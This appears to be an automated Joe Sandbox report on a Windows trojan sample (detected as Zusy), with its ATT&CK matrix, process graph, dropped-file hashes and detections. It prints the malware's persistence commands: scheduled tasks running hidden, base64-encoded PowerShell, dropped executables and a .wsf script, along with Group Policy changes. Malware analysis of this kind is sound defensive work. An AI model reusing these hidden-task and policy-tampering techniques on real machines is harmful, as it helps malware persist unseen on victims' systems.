Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00414B04 EntryPoint,GetVersion,GetCommandLineA,GetStartupInfoA,GetModuleHandleA,1_2_00414B04

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Modifies Group Policy settings
Source: C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exeFile written: C:\Windows\System32\GroupPolicy\gpt.iniJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		11
Scheduled Task/Job		11
Process Injection		2
Masquerading		1
Input Capture		121
Security Software Discovery		Remote Services1
Input Capture		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts21
Command and Scripting Interpreter		Boot or Logon Initialization Scripts11
Scheduled Task/Job		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop Protocol1
Archive Collected Data		Exfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts11
Scheduled Task/Job		Logon Script (Windows)Logon Script (Windows)1
Modify Registry		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local Accounts1
Native API		Logon Script (Mac)Logon Script (Mac)41
Virtualization/Sandbox Evasion		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud Accounts2
PowerShell		Network Logon ScriptNetwork Logon Script11
Process Injection		LSA Secrets4
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common11
Deobfuscate/Decode Files or Information		Cached Domain Credentials23
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Obfuscated Files or Information		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
File Deletion		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 753408 Sample: file.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 88 89 Antivirus detection for dropped file 2->89 91 Multi AV Scanner detection for dropped file 2->91 93 Sigma detected: Schedule system process 2->93 95 2 other signatures 2->95 10 file.exe 7 2->10         started        13 pJKKXsE.exe 8 2->13         started        16 powershell.exe 10 2->16         started        18 gpscript.exe 2->18         started        process3 file4 81 C:\Users\user\AppData\Local\...\Install.exe, PE32 10->81 dropped 20 Install.exe 4 10->20         started        83 C:\Windows\Temp\...behaviorgraphaSURYx.exe, PE32 13->83 dropped 101 Antivirus detection for dropped file 13->101 103 Multi AV Scanner detection for dropped file 13->103 105 Very long command line found 13->105 23 powershell.exe 9 13->23         started        26 gpupdate.exe 1 16->26         started        28 conhost.exe 16->28         started        signatures5 process6 file7 79 C:\Users\user\AppData\Local\...\Install.exe, PE32 20->79 dropped 30 Install.exe 10 20->30         started        99 Uses cmd line tools excessively to alter registry or file data 23->99 34 cmd.exe 23->34         started        36 conhost.exe 23->36         started        38 reg.exe 23->38         started        42 12 other processes 23->42 40 conhost.exe 26->40         started        signatures8 process9 file10 85 C:\Users\user\AppData\Local\...\pJKKXsE.exe, PE32 30->85 dropped 87 C:\Windows\System32behaviorgraphroupPolicy\gpt.ini, ASCII 30->87 dropped 107 Antivirus detection for dropped file 30->107 109 Multi AV Scanner detection for dropped file 30->109 111 Uses schtasks.exe or at.exe to add and modify task schedules 30->111 113 Modifies Group Policy settings 30->113 44 forfiles.exe 1 30->44         started        46 forfiles.exe 1 30->46         started        48 schtasks.exe 2 30->48         started        52 3 other processes 30->52 115 Uses cmd line tools excessively to alter registry or file data 34->115 50 reg.exe 34->50         started        signatures11 process12 process13 54 cmd.exe 1 44->54         started        57 conhost.exe 44->57         started        59 cmd.exe 1 46->59         started        61 conhost.exe 46->61         started        63 conhost.exe 48->63         started        65 conhost.exe 52->65         started        67 conhost.exe 52->67         started        69 conhost.exe 52->69         started        signatures14 97 Uses cmd line tools excessively to alter registry or file data 54->97 71 reg.exe 1 1 54->71         started        73 reg.exe 1 54->73         started        75 reg.exe 1 1 59->75         started        77 reg.exe 1 59->77         started        process15

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe100%AviraHEUR/AGEN.1250601
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe100%AviraHEUR/AGEN.1250601
C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe51%ReversingLabsWin32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe51%ReversingLabsWin32.Trojan.Zusy
C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe51%ReversingLabsWin32.Trojan.Zusy

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
5.2.Install.exe.230000.0.unpack100%AviraHEUR/AGEN.1250601Download File
30.0.pJKKXsE.exe.1090000.0.unpack100%AviraHEUR/AGEN.1250601Download File
30.2.pJKKXsE.exe.1090000.0.unpack100%AviraHEUR/AGEN.1250601Download File
5.0.Install.exe.230000.0.unpack100%AviraHEUR/AGEN.1250601Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000018.00000002.352296909.00000173E56E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.432102762.00000000037B1000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://github.com/Pester/Pesterpowershell.exe, 00000018.00000002.360824724.00000173E58E2000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000018.00000002.413179407.00000173F5885000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000018.00000002.410425228.00000173F574E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown

            World Map of Contacted IPs

            No contacted IP infos

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:753408
            Start date and time:2022-11-24 19:03:09 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 9s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:file.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:58
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal88.evad.winEXE@90/15@0/0
            EGA Information:
            • Successful, ratio: 40%
            HDC Information:
            • Successful, ratio: 100% (good quality ratio 97.8%)
            • Quality average: 84.8%
            • Quality standard deviation: 22.7%
            HCA Information:
            • Successful, ratio: 67%
            • Number of executed functions: 159
            • Number of non-executed functions: 28
            Cookbook Comments:
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): Conhost.exe, SgrmBroker.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): client.wns.windows.com, files.testupdate.info, clients2.google.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, api2.check-data.xyz, www.testupdate.info, www.googleapis.com, service-domain.xyz
            • Execution Graph export aborted for target powershell.exe, PID 6316 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report creation exceeded maximum time and may have missing disassembly code information.
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            19:04:10Task SchedulerRun new task: gAhELFxgt path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
            19:04:10API Interceptor1x Sleep call for process: Install.exe modified
            19:04:16Task SchedulerRun new task: bbsSMGQQDZvgelOgpL path: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe s>DC /site_id 525403 /S
            19:04:21API Interceptor36x Sleep call for process: powershell.exe modified
            19:05:14API Interceptor1x Sleep call for process: pJKKXsE.exe modified
            19:05:18Task SchedulerRun new task: agQaaMVMfgqpSGSbr path: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\GaSURYx.exe s>mY /site_id 525403 /S
            19:05:23Task SchedulerRun new task: AxVCmvJfwAUUq2 path: C:\Windows\system32\wscript.exe s>"C:\ProgramData\wizgoPrNSfGOJXVB\dsOzyCe.wsf"

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exefile.exeGet hashmaliciousBrowse
              file.exeGet hashmaliciousBrowse
                file.exeGet hashmaliciousBrowse
                  file.exeGet hashmaliciousBrowse
                    C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exefile.exeGet hashmaliciousBrowse
                      file.exeGet hashmaliciousBrowse
                        file.exeGet hashmaliciousBrowse
                          file.exeGet hashmaliciousBrowse

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):1108
                            Entropy (8bit):5.295294468448967
                            Encrypted:false
                            SSDEEP:24:3AkPpQrLAo4KAxX5qRPD42HZSCvKDe9tOBPnKEU:DPerB4nqRL/HZSCv4e9tOBfzU
                            MD5:1C80F1303DD3DDBE3C096705FF52040A
                            SHA1:3741403D56389B4EC7CF855E6C76C6DC2C95FF64
                            SHA-256:42D4B9FA1F3F8EB161A0C58AADA51D2A417CC8B5CCDA334905C62ACC84493F88
                            SHA-512:DC82F25447F671E173D1A7C4D00EAD4C3B1E040D913C7011F3D8A785625D1E26C5982DB8550A63947E996AAF104763C170E070C8BB176ED5EE17115D9DB3AB6C
                            Malicious:false
                            Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

                            C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe

                            Download File
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):6571809
                            Entropy (8bit):7.996003603865134
                            Encrypted:true
                            SSDEEP:196608:91OAmLWOhmdNwFc7/hpQd4CYYlW7bWzg+aNxKpzDkp5x4WM:3OvWOkz3Qd4joeYSxKpzDo5x4WM
                            MD5:65D01849A2062434BCE6C580CDA92A1D
                            SHA1:8BEF36557E25532961724539E4DDBB4D11970627
                            SHA-256:8B691E37EECDDAACD1BB83067CE261157895DEC8302E558C5C9D159C117151A4
                            SHA-512:0EECF3824418C210DB4257EA5F2852BB32B02C5B3CE0FE62F841F71E10EC81482D889880EE42438B3EF2DC39682BDA2CD9435DD08CF21879D92148A9C7591EBE
                            Malicious:true
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\7zS332F.tmp\__data__\config.txt

                            Download File
                            Process:C:\Users\user\Desktop\file.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):866146
                            Entropy (8bit):7.999783652399914
                            Encrypted:true
                            SSDEEP:24576:4YGhUN5iugAVdfj07IcTW6rIwX2N8m/ZQq2fd7w+IxulInxM:4YGhPufVdfjgIUWmIwX2N8SKPd86UM
                            MD5:927A00BC73AD358930C1BCA86D1F78AE
                            SHA1:AAED44842119FF3287961E29E9A7CE38B5C92DC3
                            SHA-256:526184BCF9AB17BEF2C67600F9D8E7E7CE4DDC4D4241BECC5F724E832AFB538D
                            SHA-512:E952277890D0E02B56836BFCE7BC9427CF8616D06E4EBDE2F07EAE9899E7CD837BEADD93D6919627492B44EF91E7F2E08F37597840B2801AEA5313423CEF7932
                            Malicious:false
                            Preview:.E..{..X..D.+.i.h...v...4....F.KvYl.\.by......F.....<..@M3:s.....t...?.. ..y..9.S`j.Cc.{H..t.Uo....1C.K..o....2.)gJ/39...V.Y.Q.E...QN?.^.|.D"Kiw|...M....[..'].j..^.w...6.#../.[:L.M+n.M..)......M&.{E........T...\.qK.$.zQ..W..../.O.y...-....x......|....cp.~%.5...K.+0!..X.?#|..T7........e.l.i.@].XJ.f3D..a#..I......M.MD......:kl_T.<..h.O..........+.:-A.u.`..l......b....Ol....e...m...Ka.5..N.e..?.!....0Zs..Kl.<.....D`.\{.9.a..A..yJ..}b..Q2X.......zd..k(..E....q.$I.g...u..^X.*t..{{g....{.u..I...]/D.WA......q..\8k.}...G..2....zK.......T...C~!{.G.y...]j....#..fV..T9hm29....i...@Y...1r..M ..1j..b..3.%.d....=.G/.8%a...S..qz.T6S5G..X..iF".ar..g.~..n..|...N..dz..........r.>d*..3..pg^..q.2H.H.. .o....#xV..e.[>...PEUat[.a;.U...+.1(....[t.d.oy<.t.....a.m..&.%.n..........>..x.....4_V.2U.qU=c.N.L...cg.G.<..u=&321G.....k..3.O.riv.....T;K.. .?.V....Pw.[.....U..D`T.....kvc.....u .....j>&.....B.{.k.....\.2..u.-..P.:.Z...+F..>yI+b...C..X16...C.....#..pL...2.o...

                            C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\7zS332F.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7104512
                            Entropy (8bit):7.680459343919421
                            Encrypted:false
                            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                            MD5:893793FBD70BA4A92919D09205D6C9C1
                            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\7zS3C09.tmp\Install.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):7104512
                            Entropy (8bit):7.680459343919421
                            Encrypted:false
                            SSDEEP:98304:UKZUauh5CWkkhBJtnDRLX0BE55EDpV8Y7IJyvMMdsetQfcj6P5VQ8mKUC5+oCMnK:pA59BlRDRLX0BDDp/CeKD53UC5PjUr
                            MD5:893793FBD70BA4A92919D09205D6C9C1
                            SHA1:CB1832F1F9652FAECE655FFBF49D82FEB98CA85A
                            SHA-256:A240FDA428ECCA831C7730C83F40BE6F43BB8370F33D8D66D4844B734011C57B
                            SHA-512:E4E30918B96BD5B7D0B8BC6AC189B1EBAD645B12E0AC3DE061DAA9E7003D6E746FEE1C6D9CB637A7AA19543B3339C08DBDB1E35A78628E8764A07DEDB3A73DC4
                            Malicious:true
                            Antivirus:
                            • Antivirus: Avira, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 51%
                            Joe Sandbox View:
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            • Filename: file.exe, Detection: malicious, Browse
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u.wC..$C..$C..$NF.$l..$NF$$...$NF%$...$...$H..$C..$P..$.. $W..$NF.$B..$...$B..$RichC..$................PE..L.....h^............................U?............@..................................:m...@.................................8d..x........?.......................I....................................k.@............`..8............................text............................... ..`.data....f........[.................@....idata..8....`........k.............@..@.rsrc....?.......@....k.............@..@.reloc...I.......J....l.............@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qj1olx5r.ljl.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wuyq3oxm.drj.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Preview:1

                            C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12224
                            Entropy (8bit):5.378646971222007
                            Encrypted:false
                            SSDEEP:192:ftH+8WSFv6anhZkECl+hurbf2s2DAsoPEBOoSVFEJ+aNK1eK9kN0rI:fteU767rb/095pSVW2rI
                            MD5:0CFB8B33CC3E653098EAB5725BF1BC5A
                            SHA1:5923E7777549575FFF8B5FB69A9C2C977A5A850B
                            SHA-256:B85D5245BB5160EAAC695AC6A0E8879128AD053941517F2237DB19F17918FD77
                            SHA-512:318AEC29CFA311B7024FAA96209EF1DD1A0471F04E9D698D0057B07F536A3D9387A3C240F1A6326769556BBDA3C6404C25AFF3C51312E2C82E7BB05F8B8A3B22
                            Malicious:false
                            Preview:@...e...........................................................H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.Configuration........................................T.@..>@..)@.Md@.]d@.Nd@...@.V.@.H.@.X.@..)@.[.@.NT@.HT@..S@..S@.hT@..S@..S@..S@.\.@..T@..)@..T@.@X@.?X@.

                            C:\Windows\System32\GroupPolicy\Machine\Registry.pol

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pJKKXsE.exe
                            File Type:RAGE Package Format (RPF),
                            Category:dropped
                            Size (bytes):4488
                            Entropy (8bit):3.5323112272256827
                            Encrypted:false
                            SSDEEP:96:W9H9h9j9n9a9K9o92939l9S9nyJ0R0yi0A0L0e0R060w8:5
                            MD5:ED7FF4D7DB726C80E96C58C5F5E0711C
                            SHA1:0F85681245C7A5F8BB772DF77CCF156350328CA7
